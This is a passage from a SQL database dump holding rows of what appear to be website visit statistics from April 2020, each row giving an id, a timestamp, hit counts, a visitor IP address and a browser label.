,0,'178.154.200.196','other'),(497646,1586899122,1,1,0,0,'66.249.64.23','chrome'),(497647,1586899208,2,2,0,0,'8.29.198.26','other'),(497648,1586899770,1,1,0,0,'213.180.203.16','other'),(497649,1586900363,4,4,0,0,'178.154.200.222','other'),(497650,1586900833,1,1,0,0,'37.54.20.14','chrome'),(497651,1586901261,1,1,0,0,'91.196.178.28','chrome'),(497652,1586901702,1,1,0,0,'158.69.243.99','other'),(497653,1586901789,1,1,0,0,'66.249.64.23','chrome'),(497654,1586902438,1,1,0,0,'213.180.203.16','other'),(497655,1586902559,1,1,0,0,'178.154.200.196','other'),(497656,1586902703,1,1,0,0,'178.154.200.216','other'),(497657,1586902765,1,1,0,0,'94.153.79.29','chrome'),(497658,1586902778,1,1,0,0,'178.154.200.97','other'),(497659,1586903266,1,1,0,0,'91.196.178.94','chrome'),(497660,1586903361,1,1,0,0,'91.196.178.67','chrome'),(497661,1586903610,1,1,0,0,'158.69.243.99','other'),(497662,1586903647,1,1,0,0,'178.154.200.222','other'),(497663,1586904371,1,1,0,0,'66.249.64.24','chrome'),(497664,1586904653,1,1,0,0,'178.154.200.222','other'),(497665,1586905517,1,1,0,0,'91.196.178.9','chrome'),(497666,1586905630,1,1,0,0,'178.154.200.222','other'),(497667,1586906153,1,1,0,0,'157.55.39.206','other'),(497668,1586906281,1,1,0,0,'213.180.203.17','other'),(497669,1586906366,8,8,0,0,'77.120.98.235','other'),(497670,1586906542,1,1,0,0,'178.154.200.222','other'),(497671,1586906554,1,1,0,0,'178.154.200.92','other'),(497672,1586906750,1,1,0,0,'91.209.11.236','other'),(497673,1586908067,1,1,0,0,'178.154.200.112','other'),(497674,1586908100,1,1,0,0,'178.154.200.220','other'),(497675,1586908410,2,2,0,0,'178.154.200.222','other'),(497676,1586908508,1,1,0,0,'62.205.134.182','other'),(497677,1586908758,1,0,1,0,'66.249.64.24',''),(497678,1586909032,1,1,0,0,'178.154.200.97','other'),(497679,1586909054,1,1,0,0,'95.216.96.242','other'),(497680,1586909625,1,1,0,0,'66.249.64.24','chrome'),(497681,1586909890,1,1,0,0,'125.166.117.132','chrome'),(497682,1586910041,1,1,0,0,'8.29.198.27','other'),(497683,1586910245,1,1,0,0,'213.180.203.16','other'),(497684,1586910510,1,1,0,0,'8.29.198.25','other'),(497685,1586911035,1,1,0,0,'178.154.200.222','other'),(497686,1586911429,1,1,0,0,'213.180.203.16','other'),(497687,1586912008,1,1,0,0,'178.154.200.220','other'),(497688,1586912394,1,1,0,0,'66.249.64.23','chrome'),(497689,1586913372,1,1,0,0,'213.180.203.16','other'),(497690,1586913899,1,1,0,0,'91.209.11.236','other'),(497691,1586914782,1,1,0,0,'66.249.64.25','chrome'),(497692,1586914810,1,1,0,0,'66.249.64.23','chrome'),(497693,1586914837,1,0,1,0,'66.249.64.24',''),(497694,1586915682,2,2,0,0,'178.154.200.222','other'),(497695,1586915683,1,1,0,0,'213.180.203.16','other'),(497696,1586915923,1,1,0,0,'39.104.156.79','firefox'),(497697,1586916075,1,1,0,0,'91.209.11.236','other'),(497698,1586917401,1,1,0,0,'95.217.77.97','chrome'),(497699,1586917780,1,1,0,0,'157.55.39.206','other'),(497700,1586918290,1,1,0,0,'178.154.200.220','other'),(497701,1586918461,1,1,0,0,'178.154.200.222','other'),(497702,1586918738,1,1,0,0,'157.230.248.89','firefox'),(497703,1586919557,1,1,0,0,'207.46.13.34','other'),(497704,1586920624,2,2,0,0,'92.53.78.136','chrome'),(497705,1586920884,1,1,0,0,'8.29.198.25','other'),(497706,1586921341,1,1,0,0,'8.29.198.26','other'),(497707,1586921550,1,1,0,0,'157.55.39.206','other'),(497708,1586921945,1,1,0,0,'66.249.70.33','chrome'),(497709,1586922249,1,1,0,0,'88.155.7.108','chrome'),(497710,1586922950,1,1,0,0,'207.46.13.34','other'),(497711,1586923059,8,8,0,0,'77.120.98.235','other'),(497712,1586923848,1,1,0,0,'213.180.203.50','other'),(497713,1586924140,1,1,0,0,'178.154.200.222','other'),(497714,1586924666,1,1,0,0,'66.249.64.24','chrome'),(497715,1586925189,1,1,0,0,'207.180.246.61','chrome'),(497716,1586925431,1,1,0,0,'91.196.178.189','chrome'),(497717,1586925821,1,1,0,0,'207.46.13.34','other'),(497718,1586925902,1,1,0,0,'62.205.134.182','other'),(497719,1586926562,1,1,0,0,'91.196.178.8','chrome'),(497720,1586927067,1,1,0,0,'157.55.39.206','other'),(497721,1586927120,1,1,0,0,'31.13.103.10','other'),(497722,1586927121,1,1,0,0,'31.13.103.15','other'),(497723,1586928153,1,1,0,0,'178.154.200.216','other'),(497724,1586928219,1,1,0,0,'209.17.97.18','other'),(497725,1586928765,1,1,0,0,'66.249.70.36','chrome'),(497726,1586929135,1,1,0,0,'66.249.70.38','chrome'),(497727,1586929273,1,1,0,0,'66.249.64.23','chrome'),(497728,1586929441,1,1,0,0,'66.249.64.25','chrome'),(497729,1586929455,1,1,0,0,'37.73.184.227','chrome'),(497730,1586931339,1,1,0,0,'213.180.203.16','other'),(497731,1586931355,1,1,0,0,'31.13.127.10','other'),(497732,1586931719,1,1,0,0,'8.29.198.25','other'),(497733,1586931929,1,1,0,0,'37.73.121.47','chrome'),(497734,1586932170,1,1,0,0,'8.29.198.26','other'),(497735,1586932828,1,1,0,0,'66.249.64.23','chrome'),(497736,1586932908,1,1,0,0,'110.229.216.14','firefox'),(497737,1586933123,1,1,0,0,'94.153.49.1','chrome'),(497738,1586933325,1,1,0,0,'213.180.203.16','other'),(497739,1586933522,1,1,0,0,'66.249.64.25','chrome'),(497740,1586934077,1,1,0,0,'207.46.13.34','other'),(497741,1586934339,1,1,0,0,'213.180.203.16','other'),(497742,1586934383,1,1,0,0,'66.249.64.23','chrome'),(497743,1586934722,1,1,0,0,'66.249.70.36','chrome'),(497744,1586935333,2,2,0,0,'157.55.39.206','other'),(497745,1586935347,1,1,0,0,'207.46.13.34','other'),(497746,1586935520,1,1,0,0,'66.249.64.23','chrome'),(497747,1586935817,1,1,0,0,'195.10.210.98','chrome'),(497748,1586936441,1,0,1,0,'157.55.39.206',''),(497749,1586936608,1,1,0,0,'66.249.70.33','chrome'),(497750,1586936662,1,1,0,0,'66.249.64.24','chrome'),(497751,1586936979,1,1,0,0,'130.180.208.197','chrome'),(497752,1586936986,1,1,0,0,'91.196.178.88','chrome'),(497753,1586937124,8,8,0,0,'77.120.98.235','other'),(497754,1586937132,1,1,0,0,'93.73.199.52','chrome'),(497755,1586937299,1,1,0,0,'66.249.64.23','chrome'),(497756,1586938391,1,1,0,0,'46.200.86.94','chrome'),(497757,1586938427,2,2,0,0,'157.55.39.206','other'),(497758,1586938650,1,1,0,0,'213.180.203.95','other'),(497759,1586939506,1,1,0,0,'77.222.145.82','chrome'),(497760,1586939532,1,1,0,0,'207.46.13.34','other'),(497761,1586940481,1,1,0,0,'173.252.83.14','other'),(497762,1586940483,1,1,0,0,'173.252.83.6','other'),(497763,1586940519,1,1,0,0,'37.73.141.225','chrome'),(497764,1586940671,1,1,0,0,'91.196.178.28','chrome'),(497765,1586941491,1,1,0,0,'66.249.64.25','chrome'),(497766,1586941813,1,1,0,0,'91.196.178.189','chrome'),(497767,1586941890,1,1,0,0,'95.158.42.92','chrome'),(497768,1586942548,2,2,0,0,'8.29.198.25','other'),(497769,1586943440,2,2,0,0,'37.73.141.225','chrome'),(497770,1586944416,1,1,0,0,'91.196.178.123','chrome'),(497771,1586945185,1,1,0,0,'18.209.221.24','chrome'),(497772,1586945466,2,2,0,0,'157.55.39.206','other'),(497773,1586947145,2,2,0,0,'66.249.64.25','chrome'),(497774,1586947168,2,2,0,0,'157.55.39.206','other'),(497775,1586947750,1,1,0,0,'46.201.194.44','chrome'),(497776,1586947844,1,1,0,0,'173.252.111.10','other'),(497777,1586947858,2,2,0,0,'173.252.111.2','other'),(497778,1586947859,1,1,0,0,'173.252.111.24','other'),(497782,1586947864,1,1,0,0,'173.252.111.8','other'),(497783,1586948813,2,2,0,0,'95.213.141.126','opera'),(497784,1586948835,1,1,0,0,'66.249.64.23','chrome'),(497785,1586949478,1,1,0,0,'91.196.178.39','chrome'),(497786,1586950253,2,2,0,0,'66.249.70.36','chrome'),(497787,1586950390,1,1,0,0,'66.249.70.38','chrome'),(497788,1586950808,2,2,0,0,'157.55.39.206','other'),(497789,1586952164,1,1,0,0,'109.74.154.72','chrome'),(497790,1586952312,2,2,0,0,'157.55.39.206','other'),(497791,1586952642,1,1,0,0,'178.154.200.222','other'),(497792,1586952750,1,1,0,0,'66.249.64.24','chrome'),(497793,1586953371,2,2,0,0,'8.29.198.26','other'),(497794,1586953436,1,1,0,0,'138.246.253.10','chrome'),(497795,1586953502,1,1,0,0,'131.220.6.152','chrome'),(497796,1586953625,8,8,0,0,'77.120.98.235','other'),(497797,1586953854,1,1,0,0,'66.249.64.23','chrome'),(497798,1586954388,1,1,0,0,'207.46.13.34','other'),(497799,1586954395,1,1,0,0,'178.154.200.196','other'),(497800,1586954467,1,1,0,0,'35.185.215.80','other'),(497801,1586954542,1,1,0,0,'91.196.178.77','chrome'),(497802,1586954579,1,1,0,0,'178.154.200.236','other'),(497803,1586956026,1,1,0,0,'91.196.178.28','chrome'),(497804,1586956524,1,1,0,0,'157.55.39.206','other'),(497805,1586956608,1,1,0,0,'91.196.178.79','firefox'),(497806,1586958410,1,1,0,0,'66.249.64.25','chrome'),(497807,1586959884,1,1,0,0,'157.55.39.206','other'),(497808,1586960061,1,1,0,0,'178.154.200.92','other'),(497809,1586962051,1,1,0,0,'91.196.178.39','chrome'),(497810,1586962163,1,0,1,0,'207.46.13.34',''),(497811,1586962636,3,3,0,0,'207.46.13.34','other'),(497812,1586962902,1,1,0,0,'176.67.0.30','chrome'),(497813,1586963014,1,1,0,0,'178.64.37.166','chrome'),(497814,1586963099,1,1,0,0,'66.249.64.25','chrome'),(497815,1586963109,2,2,0,0,'213.180.203.16','other'),(497816,1586963733,1,1,0,0,'157.55.39.206','other'),(497817,1586964196,1,1,0,0,'8.29.198.25','other'),(497818,1586964660,1,1,0,0,'8.29.198.26','other'),(497819,1586964958,2,2,0,0,'207.46.13.34','other'),(497820,1586965192,2,2,0,0,'157.55.39.206','other'),(497821,1586965214,1,1,0,0,'95.134.185.104','chrome'),(497822,1586965233,1,1,0,0,'66.249.64.24','chrome'),(497823,1586965598,1,1,0,0,'66.249.70.33','chrome'),(497824,1586965809,1,1,0,0,'66.249.64.23','chrome'),(497825,1586967014,1,1,0,0,'66.249.64.24','chrome'),(497826,1586967417,2,2,0,0,'207.46.13.245','other'),(497827,1586967597,1,1,0,0,'157.55.39.206','other'),(497828,1586967854,2,2,0,0,'207.46.13.240','other'),(497829,1586968929,1,1,0,0,'176.67.0.30','chrome'),(497830,1586969663,1,1,0,0,'207.46.13.34','other'),(497831,1586969784,1,1,0,0,'157.55.39.206','other'),(497832,1586970374,1,1,0,0,'66.249.64.23','chrome'),(497833,1586970846,8,8,0,0,'77.120.98.235','other'),(497834,1586970859,1,1,0,0,'173.252.111.17','other'),(497835,1586970861,1,1,0,0,'173.252.111.5','other'),(497838,1586971358,1,1,0,0,'46.211.56.247','chrome'),(497839,1586971407,1,1,0,0,'66.249.64.23','chrome'),(497840,1586971565,1,1,0,0,'207.46.13.34','other'),(497841,1586972514,1,0,1,0,'207.46.13.34',''),(497842,1586972793,1,1,0,0,'66.249.64.23','chrome'),(497843,1586973426,1,1,0,0,'157.55.39.206','other'),(497844,1586973605,1,1,0,0,'138.246.253.15','chrome'),(497845,1586973614,1,0,1,0,'66.249.64.24',''),(497846,1586974185,1,1,0,0,'91.196.178.180','chrome'),(497847,1586974532,2,2,0,0,'66.249.70.38','chrome'),(497848,1586974892,1,1,0,0,'91.196.178.28','chrome'),(497849,1586975009,1,1,0,0,'178.95.245.28','chrome'),(497850,1586975019,2,2,0,0,'8.29.198.25','other'),(497851,1586975684,1,1,0,0,'66.249.64.23','chrome'),(497852,1586975967,1,0,1,0,'66.249.64.24',''),(497853,1586976119,2,2,0,0,'52.210.229.173','chrome'),(497854,1586976213,1,1,0,0,'66.249.64.25','chrome'),(497855,1586976811,1,1,0,0,'66.249.64.23','chrome'),(497856,1586977608,2,2,0,0,'157.55.39.206','other'),(497857,1586977931,1,1,0,0,'207.46.13.34','other'),(497858,1586978807,1,1,0,0,'188.115.128.163','chrome'),(497859,1586979249,1,1,0,0,'157.55.39.206','other'),(497860,1586979526,1,1,0,0,'207.46.13.34','other'),(497861,1586980195,1,1,0,0,'173.252.111.20','other'),(497862,1586980280,1,0,1,0,'157.55.39.206',''),(497863,1586980385,1,1,0,0,'66.249.64.23','chrome'),(497864,1586980861,1,1,0,0,'193.106.30.99','chrome'),(497865,1586981325,1,1,0,0,'194.54.160.85','chrome'),(497866,1586981356,2,2,0,0,'207.46.13.34','other'),(497867,1586982069,1,1,0,0,'66.249.64.23','chrome'),(497868,1586982079,2,2,0,0,'157.55.39.206','other'),(497869,1586983745,1,1,0,0,'157.55.39.206','other'),(497870,1586984954,1,1,0,0,'66.249.70.33','chrome'),(497871,1586985851,1,1,0,0,'8.29.198.26','other'),(497872,1586986308,1,1,0,0,'8.29.198.25','other'),(497873,1586987413,8,8,0,0,'77.120.98.235','other'),(497874,1586987724,1,1,0,0,'207.46.13.34','other'),(497875,1586987807,2,2,0,0,'157.55.39.206','other'),(497876,1586988808,2,1,1,0,'207.46.13.34',''),(497877,1586989293,2,2,0,0,'207.46.13.34','other'),(497878,1586989796,1,0,1,0,'157.55.39.206',''),(497879,1586990257,1,1,0,0,'207.46.13.34','other'),(497880,1586990470,1,1,0,0,'66.249.70.36','chrome'),(497881,1586991846,1,1,0,0,'54.36.149.38','other'),(497882,1586991933,1,1,0,0,'54.36.149.60','other'),(497883,1586992012,1,1,0,0,'54.36.149.43','other'),(497884,1586992165,1,1,0,0,'54.36.149.76','other'),(497885,1586992507,1,1,0,0,'158.69.241.223','chrome'),(497886,1586992776,1,1,0,0,'54.36.149.30','other'),(497887,1586992886,1,1,0,0,'66.249.64.25','chrome'),(497888,1586992998,1,1,0,0,'207.46.13.34','other'),(497889,1586994120,1,1,0,0,'157.55.39.48','other'),(497890,1586994906,1,1,0,0,'62.205.134.182','other'),(497891,1586995053,1,1,0,0,'207.46.13.34','other'),(497892,1586995900,1,1,0,0,'157.55.39.206','other'),(497893,1586996664,1,0,1,0,'66.249.64.23',''),(497894,1586996675,2,2,0,0,'8.29.198.26','other'),(497895,1586997636,1,1,0,0,'157.55.39.206','other'),(497896,1586997755,1,1,0,0,'66.249.64.23','chrome'),(497897,1586998523,1,1,0,0,'66.249.64.25','chrome'),(497898,1586999619,1,1,0,0,'207.46.13.34','other'),(497899,1587000363,1,1,0,0,'194.44.228.210','chrome'),(497900,1587001275,1,1,0,0,'18.191.207.220','chrome'),(497901,1587001803,1,1,0,0,'31.172.136.61','chrome'),(497902,1587002492,1,1,0,0,'66.249.64.25','chrome'),(497903,1587002828,1,1,0,0,'157.55.39.48','other'),(497904,1587003843,8,8,0,0,'77.120.98.235','other'),(497905,1587007499,1,1,0,0,'8.29.198.26','other'),(497906,1587007692,1,1,0,0,'213.180.203.16','chrome'),(497907,1587007699,2,2,0,0,'178.154.200.220','chrome'),(497908,1587007929,1,1,0,0,'54.36.149.29','other'),(497909,1587007959,1,1,0,0,'8.29.198.25','other'),(497910,1587008048,1,1,0,0,'66.249.64.23','chrome'),(497911,1587008061,1,1,0,0,'54.36.149.40','other'),(497912,1587008553,1,1,0,0,'178.154.200.241','chrome'),(497913,1587009076,2,2,0,0,'178.154.200.222','chrome'),(497914,1587009154,1,1,0,0,'213.180.203.16','chrome'),(497915,1587009598,1,1,0,0,'176.31.117.59','firefox'),(497916,1587010059,1,1,0,0,'178.154.200.222','other'),(497917,1587010145,1,1,0,0,'54.36.149.81','other'),(497918,1587010344,1,1,0,0,'213.180.203.16','chrome'),(497919,1587010425,2,2,0,0,'157.55.39.206','other'),(497920,1587011154,2,2,0,0,'178.154.200.222','other'),(497921,1587011190,1,1,0,0,'178.154.200.112','other'),(497922,1587011202,1,1,0,0,'178.154.200.222','chrome'),(497923,1587011605,1,1,0,0,'213.180.203.16','chrome'),(497924,1587011667,1,1,0,0,'66.249.70.36','chrome'),(497925,1587011821,1,1,0,0,'178.154.200.196','chrome'),(497926,1587012029,1,1,0,0,'178.154.200.220','chrome'),(497927,1587012377,1,1,0,0,'178.154.200.92','chrome'),(497928,1587012430,1,1,0,0,'62.205.134.182','other'),(497929,1587012449,2,2,0,0,'178.154.200.97','chrome'),(497930,1587012481,1,1,0,0,'213.180.203.140','chrome'),(497931,1587012656,1,1,0,0,'213.180.203.29','other'),(497932,1587013019,2,2,0,0,'213.180.203.16','chrome'),(497933,1587013124,1,1,0,0,'178.154.200.222','other'),(497934,1587013148,1,0,1,0,'157.55.39.48',''),(497935,1587013605,1,1,0,0,'178.154.200.196','chrome'),(497936,1587013719,1,1,0,0,'213.180.203.16','other'),(497937,1587013798,1,1,0,0,'178.154.200.222','chrome'),(497938,1587013936,1,1,0,0,'157.55.39.48','other'),(497939,1587014107,1,1,0,0,'31.13.115.22','other'),(497940,1587014109,1,1,0,0,'31.13.115.2','other'),(497943,1587014316,1,1,0,0,'31.13.115.15','other'),(497944,1587014879,1,1,0,0,'157.55.39.206','other'),(497945,1587014993,1,1,0,0,'178.154.200.97','chrome'),(497946,1587015278,1,1,0,0,'178.154.200.222','chrome'),(497947,1587015430,3,3,0,0,'178.154.200.220','chrome'),(497948,1587016261,1,1,0,0,'66.249.64.23','chrome'),(497949,1587016381,1,1,0,0,'178.154.200.196','chrome'),(497950,1587016548,1,1,0,0,'178.154.200.222','other'),(497951,1587016707,1,1,0,0,'54.36.149.17','other'),(497952,1587016772,1,1,0,0,'54.36.149.57','other'),(497953,1587016805,1,1,0,0,'54.36.149.88','other'),(497954,1587016813,1,1,0,0,'54.36.149.34','other'),(497955,1587016815,1,1,0,0,'54.36.149.10','other'),(497956,1587016819,1,1,0,0,'54.36.149.66','other'),(497957,1587016824,1,1,0,0,'54.36.149.87','other'),(497958,1587016826,2,2,0,0,'54.36.149.99','other'),(497959,1587016834,1,1,0,0,'54.36.149.39','other'),(497960,1587016835,1,1,0,0,'54.36.149.69','other'),(497961,1587017204,1,1,0,0,'213.180.203.16','chrome'),(497962,1587018182,8,8,0,0,'77.120.98.235','other'),(497963,1587018323,2,2,0,0,'178.154.200.222','other'),(497964,1587018325,1,1,0,0,'8.29.198.26','other'),(497965,1587018371,1,1,0,0,'66.249.64.23','chrome'),(497966,1587018782,2,2,0,0,'178.154.200.220','chrome'),(497967,1587018783,1,1,0,0,'8.29.198.25','other'),(497968,1587018939,1,1,0,0,'91.196.177.157','chrome'),(497969,1587018986,1,1,0,0,'91.196.178.177','chrome'),(497970,1587019431,1,1,0,0,'178.154.200.222','other'),(497971,1587019445,1,1,0,0,'213.180.203.16','chrome'),(497972,1587019881,1,1,0,0,'178.154.200.196','other'),(497973,1587021195,1,1,0,0,'91.209.11.236','other'),(497974,1587021203,1,1,0,0,'178.154.200.222','other'),(497975,1587021434,2,2,0,0,'213.180.203.16','chrome'),(497976,1587021560,1,1,0,0,'178.154.200.216','chrome'),(497977,1587021786,1,1,0,0,'213.180.203.95','other'),(497978,1587022526,1,1,0,0,'178.154.200.97','chrome'),(497979,1587022528,1,1,0,0,'213.180.203.17','chrome'),(497980,1587022652,1,1,0,0,'213.180.203.109','other'),(497981,1587022888,1,1,0,0,'178.154.200.222','other'),(497982,1587023295,1,1,0,0,'178.154.200.236','chrome'),(497983,1587023380,1,1,0,0,'178.154.200.222','chrome'),(497984,1587023576,2,2,0,0,'157.55.39.48','other'),(497985,1587024050,1,1,0,0,'178.154.200.196','other'),(497986,1587024052,1,1,0,0,'213.180.203.17','other'),(497987,1587024223,3,3,0,0,'157.55.39.206','other'),(497988,1587024283,1,1,0,0,'207.46.13.34','other'),(497989,1587024329,1,1,0,0,'178.154.200.92','chrome'),(497990,1587024354,1,1,0,0,'213.180.203.109','chrome'),(497991,1587024910,1,1,0,0,'213.180.203.95','other'),(497992,1587024932,1,1,0,0,'213.180.203.142','chrome'),(497993,1587025434,1,1,0,0,'178.154.200.216','chrome'),(497994,1587025559,1,1,0,0,'178.154.200.106','other'),(497995,1587025874,1,1,0,0,'213.180.203.29','other'),(497996,1587026114,1,1,0,0,'213.180.203.16','chrome'),(497997,1587026115,1,1,0,0,'178.154.200.220','other'),(497998,1587026116,1,1,0,0,'178.154.200.92','other'),(497999,1587026265,1,1,0,0,'207.46.13.34','other'),(498000,1587026611,1,1,0,0,'178.154.200.236','chrome'),(498001,1587026661,1,1,0,0,'178.154.200.196','other'),(498002,1587026886,1,1,0,0,'178.154.200.222','other'),(498003,1587027035,3,3,0,0,'213.180.203.16','chrome'),(498004,1587027288,1,1,0,0,'46.211.36.208','chrome'),(498005,1587027492,2,2,0,0,'178.154.200.222','chrome'),(498006,1587027776,1,1,0,0,'91.196.177.15','chrome'),(498007,1587027828,1,1,0,0,'178.154.200.216','other'),(498008,1587028254,1,1,0,0,'66.249.64.25','chrome'),(498009,1587028378,1,1,0,0,'213.180.203.101','chrome'),(498010,1587028379,1,1,0,0,'178.154.200.112','chrome'),(498011,1587028988,1,1,0,0,'213.180.203.101','other'),(498012,1587029153,2,2,0,0,'8.29.198.26','other'),(498013,1587029224,1,1,0,0,'18.216.131.195','chrome'),(498014,1587029714,1,1,0,0,'213.180.203.101','chrome'),(498015,1587029795,1,1,0,0,'178.154.200.155','chrome'),(498016,1587030032,1,1,0,0,'178.154.200.222','other'),(498017,1587030130,1,1,0,0,'213.180.203.16','other'),(498018,1587030374,1,1,0,0,'178.154.200.112','chrome'),(498019,1587031446,8,8,0,0,'77.120.98.235','other'),(498020,1587031829,2,2,0,0,'91.196.177.15','other'),(498021,1587031857,1,1,0,0,'178.154.200.220','chrome'),(498022,1587032209,1,1,0,0,'178.154.200.236','chrome'),(498023,1587032523,1,1,0,0,'213.180.203.142','chrome'),(498024,1587032806,1,1,0,0,'178.154.200.67','chrome'),(498025,1587033165,1,1,0,0,'178.92.159.181','chrome'),(498026,1587033231,1,1,0,0,'66.249.64.24','chrome'),(498027,1587033352,1,1,0,0,'178.154.200.19','chrome'),(498028,1587033355,1,1,0,0,'213.180.203.70','chrome'),(498029,1587033396,1,1,0,0,'178.154.200.220','chrome'),(498030,1587033460,1,1,0,0,'31.129.177.119','chrome'),(498031,1587033665,2,2,0,0,'178.154.200.222','other'),(498032,1587033720,1,1,0,0,'213.180.203.16','other'),(498033,1587034467,1,1,0,0,'54.36.149.50','other'),(498034,1587034506,1,1,0,0,'66.249.64.23','chrome'),(498035,1587034707,1,1,0,0,'213.180.203.16','chrome'),(498036,1587035145,1,1,0,0,'157.55.39.206','other'),(498037,1587035253,1,1,0,0,'178.154.200.222','other'),(498038,1587035549,1,1,0,0,'207.46.13.34','other'),(498039,1587035563,2,2,0,0,'178.154.200.220','chrome'),(498040,1587035699,3,3,0,0,'178.154.200.222','chrome'),(498041,1587036794,1,1,0,0,'173.252.111.17','other'),(498042,1587036795,1,1,0,0,'173.252.111.22','other'),(498044,1587036995,1,1,0,0,'178.154.200.67','chrome'),(498045,1587037167,1,1,0,0,'173.252.111.23','other'),(498046,1587037208,1,1,0,0,'178.154.200.222','other'),(498047,1587037287,1,1,0,0,'157.55.39.48','other'),(498048,1587037516,1,1,0,0,'178.154.200.220','chrome'),(498049,1587037558,1,1,0,0,'178.154.200.222','chrome'),(498050,1587037669,3,3,0,0,'213.180.203.16','chrome'),(498051,1587037694,1,1,0,0,'66.249.70.36','chrome'),(498052,1587037726,1,1,0,0,'178.154.200.112','other'),(498053,1587037929,1,1,0,0,'91.196.178.28','chrome'),(498054,1587038630,2,2,0,0,'66.249.64.24','chrome'),(498055,1587038778,1,1,0,0,'178.154.200.222','chrome'),(498056,1587038802,1,1,0,0,'109.74.154.72','chrome'),(498057,1587038864,1,1,0,0,'213.180.203.16','other'),(498058,1587038969,1,1,0,0,'178.154.200.236','other'),(498059,1587039403,1,1,0,0,'213.180.203.16','chrome'),(498060,1587039683,1,1,0,0,'131.220.6.152','chrome'),(498061,1587039768,1,1,0,0,'178.154.200.222','other'),(498062,1587039769,2,2,0,0,'157.55.39.206','other'),(498063,1587039983,1,1,0,0,'8.29.198.26','other'),(498064,1587040148,1,1,0,0,'207.46.13.34','other'),(498065,1587040432,1,1,0,0,'8.29.198.27','other'),(498066,1587040952,1,1,0,0,'178.154.200.222','other'),(498067,1587040967,1,1,0,0,'178.154.200.236','other'),(498068,1587041422,2,2,0,0,'213.180.203.16','chrome'),(498069,1587041842,1,1,0,0,'78.111.186.31','firefox'),(498070,1587042128,2,2,0,0,'178.154.200.222','chrome'),(498071,1587042351,1,1,0,0,'178.154.200.236','other'),(498072,1587042377,1,1,0,0,'178.154.200.196','other'),(498073,1587042714,2,2,0,0,'66.249.64.24','chrome'),(498074,1587043133,1,1,0,0,'178.154.200.222','other'),(498075,1587043279,1,1,0,0,'213.180.203.16','other'),(498076,1587043443,1,1,0,0,'66.249.64.23','chrome'),(498077,1587044416,1,1,0,0,'213.180.203.140','chrome'),(498078,1587044466,1,1,0,0,'178.154.200.236','other'),(498079,1587044543,2,2,0,0,'178.154.200.92','chrome'),(498080,1587044815,1,1,0,0,'213.180.203.122','chrome'),(498081,1587045036,1,1,0,0,'178.154.200.196','chrome'),(498082,1587045097,1,1,0,0,'66.249.64.25','chrome'),(498083,1587045482,1,1,0,0,'157.55.39.48','other'),(498084,1587045569,1,1,0,0,'178.154.200.220','chrome'),(498085,1587045933,2,2,0,0,'213.180.203.16','chrome'),(498086,1587046071,1,1,0,0,'178.154.200.216','chrome'),(498087,1587046200,1,1,0,0,'66.249.64.25','chrome'),(498088,1587046806,1,1,0,0,'66.249.64.24','chrome'),(498089,1587046879,1,1,0,0,'178.154.200.222','chrome'),(498090,1587047279,8,8,0,0,'77.120.98.235','other'),(498091,1587047312,1,1,0,0,'178.154.200.41','chrome'),(498092,1587047324,1,1,0,0,'178.154.200.191','chrome'),(498093,1587047424,1,1,0,0,'178.154.200.216','chrome'),(498094,1587047644,1,1,0,0,'157.55.39.48','other'),(498095,1587047802,1,1,0,0,'207.46.13.34','other'),(498096,1587047965,1,1,0,0,'178.154.200.222','chrome'),(498097,1587047979,1,1,0,0,'176.36.50.232','chrome'),(498098,1587048008,1,1,0,0,'213.180.203.16','chrome'),(498099,1587048021,2,2,0,0,'66.249.64.23','chrome'),(498100,1587048334,1,1,0,0,'157.55.39.206','other'),(498101,1587048813,1,1,0,0,'178.154.200.196','chrome'),(498102,1587048918,1,1,0,0,'178.154.200.222','other'),(498103,1587049443,1,1,0,0,'178.154.200.112','chrome'),(498104,1587049566,1,1,0,0,'31.41.112.4','chrome'),(498105,1587049784,1,1,0,0,'91.196.178.28','chrome'),(498106,1587049810,2,2,0,0,'178.154.200.92','chrome'),(498107,1587049868,1,1,0,0,'178.154.200.220','other'),(498108,1587049945,1,1,0,0,'178.154.200.97','other'),(498109,1587050126,1,1,0,0,'91.196.178.61','chrome'),(498110,1587050219,1,1,0,0,'178.154.200.196','other'),(498111,1587050246,1,1,0,0,'66.249.64.25','chrome'),(498112,1587050296,1,1,0,0,'207.46.13.34','other'),(498113,1587050383,1,1,0,0,'178.154.200.220','chrome'),(498114,1587050513,1,1,0,0,'178.154.200.112','chrome'),(498115,1587050812,1,1,0,0,'8.29.198.27','other'),(498116,1587051056,1,1,0,0,'66.249.64.24','chrome'),(498117,1587051251,1,1,0,0,'8.29.198.26','other'),(498118,1587051388,1,1,0,0,'13.66.4.211','chrome'),(498119,1587051873,1,1,0,0,'157.55.39.48','other'),(498120,1587051919,1,1,0,0,'213.180.203.16','other'),(498121,1587052385,1,1,0,0,'93.72.233.57','chrome'),(498122,1587052581,1,1,0,0,'178.154.200.196','chrome'),(498123,1587052609,1,1,0,0,'207.46.13.34','other'),(498124,1587052729,1,0,1,0,'157.55.39.206',''),(498125,1587053237,1,1,0,0,'66.249.64.23','chrome'),(498126,1587054143,2,2,0,0,'213.180.203.16','chrome'),(498127,1587055017,2,2,0,0,'178.154.200.220','chrome'),(498128,1587055308,1,1,0,0,'176.115.96.153','chrome'),(498129,1587055393,1,1,0,0,'178.154.200.97','chrome'),(498130,1587055480,2,2,0,0,'178.154.200.222','other'),(498131,1587055796,2,2,0,0,'157.55.39.48','other'),(498132,1587056706,1,1,0,0,'213.180.203.16','other'),(498133,1587056886,1,1,0,0,'178.154.200.222','other'),(498134,1587056919,1,1,0,0,'178.154.200.222','chrome'),(498135,1587056974,1,1,0,0,'157.55.39.206','other'),(498136,1587057335,1,1,0,0,'66.249.70.38','chrome'),(498137,1587057363,1,1,0,0,'178.154.200.97','chrome'),(498138,1587057509,1,1,0,0,'157.55.39.48','other'),(498139,1587057681,1,1,0,0,'173.252.111.22','other'),(498140,1587057682,1,1,0,0,'173.252.111.5','other'),(498141,1587058314,1,1,0,0,'207.46.13.34','other'),(498142,1587058316,1,1,0,0,'178.154.200.97','chrome'),(498143,1587058578,1,1,0,0,'178.154.200.222','other'),(498144,1587058970,1,1,0,0,'213.180.203.16','chrome'),(498145,1587059417,2,2,0,0,'157.55.39.206','other'),(498146,1587059547,1,1,0,0,'178.154.200.196','chrome'),(498147,1587059771,1,1,0,0,'178.154.200.236','chrome'),(498148,1587059873,3,3,0,0,'213.180.203.16','chrome'),(498149,1587059991,1,1,0,0,'91.196.178.28','chrome'),(498150,1587060021,1,1,0,0,'37.73.136.63','chrome'),(498151,1587060064,1,1,0,0,'178.154.200.220','chrome'),(498152,1587060509,1,1,0,0,'178.154.200.155','chrome'),(498153,1587060519,1,1,0,0,'213.180.203.109','chrome'),(498154,1587060844,1,1,0,0,'2